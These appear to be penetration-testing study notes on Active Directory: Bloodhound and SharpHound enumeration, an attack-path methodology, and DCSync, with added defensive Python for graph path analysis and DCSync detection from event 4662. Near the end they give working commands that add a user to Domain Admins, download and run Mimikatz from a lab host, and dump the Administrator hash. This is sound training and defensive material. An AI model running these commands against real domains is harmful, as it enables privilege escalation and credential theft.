Bloodhound

Overview

Bloodhound works in much the same way as ldapdomaindump, but it also collects data using Kerberos tickets and SMB sessions.

Bloodhound allows for better visualization of attack paths, misconfigurations and potential privilege escalation paths in the domain.

Domain Enumeration

sudo neo4j console
sudo bloodhound
sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all

Upload the dumped files into the Bloodhound GUI

Custom user to machine session query

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Sharphound

If you don't have valid AD credentials and only have an open shell, you can run SharpHound.exe from that shell to collect the data.

SharpHound.exe -c All

Methodology

  • Mark all pwned machines

  • Check Reachable High Value Targets

    • Essentially checks whether compromising that one machine could lead to compromise of the entire domain

  • Check Inbound Control Rights

    • Which accounts/groups can control this object

  • Check Outbound Control Rights (First Degree Object Control)

    • Which objects can our compromised machine control
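The four checks above are graph questions, and it helps to see what the GUI is computing when you click them. The following is an added example, not code from the original notes or from the Bloodhound project: a tiny in-memory graph built from constructed edges in Bloodhound's direction convention (MemberOf goes principal to group, AdminTo goes principal to computer, HasSession goes computer to user, GenericAll/WriteDacl go controlling object to controlled object). The principal names, the edge list and the choice of Domain Admins as the only high value target are all assumptions made for the sample; the same breadth-first search is what finds a "reachable high value target" on a real graph, and listing inbound control rights on that same data shows which edges would have to be removed to cut the path.

```python
from collections import deque

# Constructed sample edges: (source, edge type, target). Not a real domain.
EDGES = [
    ("GREG@PNPT.LOCAL",      "MemberOf",   "DOMAIN USERS@PNPT.LOCAL"),
    ("GREG@PNPT.LOCAL",      "AdminTo",    "WS01.PNPT.LOCAL"),
    ("WS01.PNPT.LOCAL",      "HasSession", "ITMANAGER@PNPT.LOCAL"),
    ("ITMANAGER@PNPT.LOCAL", "MemberOf",   "IT ADMINS@PNPT.LOCAL"),
    ("IT ADMINS@PNPT.LOCAL", "GenericAll", "DOMAIN ADMINS@PNPT.LOCAL"),
    ("HELPDESK@PNPT.LOCAL",  "WriteDacl",  "WS01.PNPT.LOCAL"),
    ("BOB@PNPT.LOCAL",       "MemberOf",   "DOMAIN USERS@PNPT.LOCAL"),
]

# Assumed: Domain Admins is the only high value target in this sample.
HIGH_VALUE = {"DOMAIN ADMINS@PNPT.LOCAL"}
# Edge types that count as direct "control" of the target object.
CONTROL_EDGES = {"GenericAll", "WriteDacl", "AdminTo"}


def build_graph(edges):
    """Return (outbound, inbound) adjacency maps: node -> [(edge type, other node)]."""
    outbound, inbound = {}, {}
    for src, kind, dst in edges:
        outbound.setdefault(src, []).append((kind, dst))
        inbound.setdefault(dst, []).append((kind, src))
    return outbound, inbound


def inbound_control(inbound, obj):
    """Inbound Control Rights: principals holding a control edge onto obj."""
    return sorted(src for kind, src in inbound.get(obj, []) if kind in CONTROL_EDGES)


def outbound_control(outbound, principal):
    """First Degree Object Control: objects the principal directly controls."""
    return sorted(dst for kind, dst in outbound.get(principal, []) if kind in CONTROL_EDGES)


def path_to_high_value(outbound, start, high_value=HIGH_VALUE):
    """Reachable High Value Targets: shortest chain of edges from start to a
    high value target as 'A -[Edge]-> B' strings, or None if none exists."""
    prev = {start: None}          # node -> (parent, edge type) for path rebuild
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node in high_value:
            steps = []
            while prev[node] is not None:
                parent, kind = prev[node]
                steps.append(f"{parent} -[{kind}]-> {node}")
                node = parent
            return steps[::-1]
        for kind, nxt in outbound.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, kind)
                queue.append(nxt)
    return None


def triage(edges, pwned, high_value=HIGH_VALUE):
    """Apply the methodology to every marked (pwned) principal: the path to a
    high value target, if any, and the objects it controls at first degree."""
    outbound, _ = build_graph(edges)
    return {p: {"path": path_to_high_value(outbound, p, high_value),
                "controls": outbound_control(outbound, p)} for p in pwned}


if __name__ == "__main__":
    for principal, result in triage(EDGES, {"GREG@PNPT.LOCAL", "BOB@PNPT.LOCAL"}).items():
        print(principal, result)
    _, inbound = build_graph(EDGES)
    print("Inbound control on WS01:", inbound_control(inbound, "WS01.PNPT.LOCAL"))
```

On the sample data GREG reaches Domain Admins in four hops through the session on WS01, while BOB reaches nothing; the inbound control list on WS01 names the two principals (GREG via AdminTo, HELPDESK via WriteDacl) whose rights would need to be reviewed to break that path.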

DCSync/GetChangesAll

If you have the GetChanges and GetChangesAll privileges you can perform a DCSync attack. The attack abuses the replication mechanism that domain controllers use to sync with each other and make sure they all hold the most up to date data: a replication request from an account holding those rights is answered just like one from another domain controller, so all of the NTLM hashes can be extracted by requesting a DCSync from the domain controller.
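Because a DCSync looks to the domain controller like ordinary replication, the way to catch it is to audit who is exercising the replication rights. The following is an added example, not part of the original notes: a check over Windows Security event 4662 records that flags any subject other than a known domain controller account requesting the replication control access rights. The three GUIDs are the real control access right identifiers for DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set; the domain controller allow-list and the event records themselves are constructed for the sample.

```python
import re

# Real control access right GUIDs that directory replication (and so DCSync) uses.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allow-list: machine accounts of the legitimate domain controllers.
KNOWN_REPLICATORS = {"DC01$", "DC02$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 records, reduced to the fields the check uses.
SAMPLE_EVENTS = [
    # DC-to-DC replication: expected, no alert.
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "PNPT",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising Get-Changes-All: DCSync pattern, alert.
    {"EventID": 4662, "SubjectUserName": "itmanager", "SubjectDomainName": "PNPT",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Same user touching an unrelated object/property GUID: not replication, no alert.
    {"EventID": 4662, "SubjectUserName": "itmanager", "SubjectDomainName": "PNPT",
     "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    # A logon event: wrong event ID, ignored.
    {"EventID": 4624, "SubjectUserName": "greg", "SubjectDomainName": "PNPT"},
]


def replication_rights(event):
    """Names of the replication rights listed in the event's Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))


def is_dcsync_candidate(event, allow=KNOWN_REPLICATORS):
    """True for a 4662 that requests replication rights from a subject that is
    not one of the known domain controller accounts."""
    if event.get("EventID") != 4662:
        return False
    if not replication_rights(event):
        return False
    allowed = {a.upper() for a in allow}
    return event.get("SubjectUserName", "").upper() not in allowed


def find_dcsync_alerts(events, allow=KNOWN_REPLICATORS):
    """Return one alert per suspicious replication request."""
    alerts = []
    for e in events:
        if is_dcsync_candidate(e, allow):
            alerts.append({
                "subject": f"{e.get('SubjectDomainName', '')}\\{e['SubjectUserName']}",
                "rights": replication_rights(e),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_dcsync_alerts(SAMPLE_EVENTS):
        print(f"possible DCSync by {alert['subject']}: {', '.join(alert['rights'])}")
```

Event 4662 is only written when the Directory Service Access audit subcategory is enabled and the domain object carries a SACL for these rights, so the check depends on that auditing being in place. Any account that replicates legitimately without being a domain controller (a directory synchronization service account, for instance) belongs in the allow-list, otherwise it will alert on every sync.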

Add your account to the Domain Admins group (the command below adds the itmanager account)

net group "Domain Admins" itmanager /add /domain

Bypass AMSI, then load Mimikatz

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Mimikatz.ps1')

Grab the domain admin hash

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'
